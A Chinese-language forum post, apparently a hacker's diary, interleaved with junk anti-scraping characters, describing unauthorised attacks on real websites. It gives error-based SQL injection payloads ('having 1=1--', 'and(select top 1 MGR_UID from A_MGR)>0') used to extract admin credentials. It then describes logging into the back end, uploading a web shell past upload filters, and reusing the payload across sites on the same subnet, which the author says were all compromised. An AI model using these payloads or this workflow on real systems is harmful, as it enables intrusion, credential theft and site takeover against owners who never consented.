发现一个注入点
. D0 V* {2 U: z; ghttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389& }) W* v5 n/ |% r/ H+ U9 p
- i' O1 c$ z N
习惯性的加’having1=1--
% N7 ~! K" J; n9 O, b4 _$ k
! H6 e y+ f5 p( n# E5 mhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
0 y T& {: p0 c. N! Z; E! k" E) b* L' p6 E5 q
0
: N( I7 n/ G. u- D U( U# ^6 ^* N- M1 i0 J7 k; F
爆出Diary_A.dl_Title(这时候很激动啊)9 I! P/ r! T; `! x
1 X3 |& r l4 E; P |! Y
那么继续
: k; n2 R2 ^; V" ?( x' |" chttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—/ ?% m' ^7 c; A! V
0 |% S8 ?) G5 ?, C4 X
继续,一直爆下去
3 k e0 W1 |- f" j/ S/ p1 R& Q0 w8 |4 B! l* J0 U
爆到几个字段和表段 但是没找到需要的管理用户的字段! i! o+ }& B" k9 B+ R1 q$ ~
( S2 c' E v8 W2 M蛋疼了 怎么办 然后去后台登陆页看源码
, l5 m1 u+ S+ E; y- h; X) t! b9 N4 i4 }* K; L. S6 C
0
. O) K9 z9 |+ |9 [+ ^. u0 c5 |/ N" Z$ b! n7 [- b9 [! O( b) Q
Input name= “ADUID”
0 i( v0 d3 E; _: p. kInput name= “ADPWD”8 Q, S5 ^6 W/ n; ]
7 q7 E/ o* } t( o* C% l3 d: T
很幸运 找到了字段那就继续) H ~& P& f: c! F! F
找到之后开始爆用户
: ?; ]3 J7 n& N/ Vhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
6 e$ c- l+ J$ F: C爆密码8 Q' W- K' {9 }
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
5 N- s5 N3 u/ l0 S8 Y/ O测试了下 这个注入点只能爆到文章哪里的表
6 a/ h, K$ m i) H/ c% f# c$ w/ m# G: [( r. m: ]
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
" K! e$ ^ K: s) Y1 Q- t
/ n7 K/ H4 { B又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
% G/ {9 Q8 N1 `" h- B2 h
' e! b- |/ ?; J2 M% Z4 P. U473
' ~) B" w2 i0 U
+ N: r' e" r8 v7 v9 e) L进后台3 k9 {& g' I/ e1 h
" {0 Z8 u; G8 J
5 y% l% _! ?* C) a n5 W# T. W5 _; N发现几个上传点 有的地方不能上传 而且防止恶意代码' e" H8 @$ f/ u6 n
3 Q x% \1 }: V/ j* K, p
没办法 各种百度各种找大牛 找到一只好像可以突破的马2 K& ]& Z7 c- P& Z( i
/ N+ d* g# u9 F- {' z" u+ z8 ~' j, C( s! N- @# | b( u
在系统管理那里直接上传 不过没有显示地址 ` t g. v" w) c7 m" x; j
# z2 ]: n; F% s( G5 U' e- H h( L
再上传一次 抓包 搞定OK& C+ t* P$ \% G* t2 D6 j; f; \" f) i3 I
, B3 L/ W* }3 P3 U: c
2 J+ o5 c; R: W% F9 G0 F
; q( z0 T' q C$ I0 r- Q472
0 n! P! K1 }0 H- o' W1 h9 q, D ~' U6 r m8 O% L# Y
晚上不行了 去睡觉。。。( T; e- l) _9 S" b4 s+ p3 \
第二天刚起床 闲的没事做继续日站吧 % i& T0 s6 ^& ` @( ], {, C; J9 W4 V
# a3 u; J- L0 V) x找个站 就把这个站的旁c扫了下
: M* ]# J# L- U5 s7 Q# E7 m, e& v. B+ ~5 w9 h% D1 s3 L' o4 G
发现c段也有一个购物站 ,然后还和这个站的模板差不多
+ F. V+ F+ C% ?( ]3 ^$ C8 D$ s, L6 `/ g
就找到会员登录口测试 |+ |2 ]! c) b* `! N/ w* p; g6 s! z* j
: S; ^/ R$ }8 W0 h& o( `'and (select top 1 MGR_UID from A_MGR)>0—6 m, C4 F$ t1 a$ }8 r2 }8 p
果断爆到了 这时候我很激动 通杀
8 ^+ m& n) f" F" d6 D8 \
4 Z( O- n7 s L U' J& n再次翻c段
" h" m% u5 M1 G2 P
|2 l$ p( x8 g8 u- g% I翻出几个站 都成功拿下& d# _ w4 k. S
, T4 y( d6 u' a8 x" e. A V! f, ?. z. x- U' r7 `. u5 M
9 b) O; z; ^) d8 J修复方案:
9 H9 Y& i1 g% E, U8 c他们比我专业 , a6 q7 S1 A6 }2 U( L
& P( h6 r! z# M4 X$ R
: d* I6 X) r) c) N! `% [" l( ~$ z8 r$ q3 n2 N( _7 E
|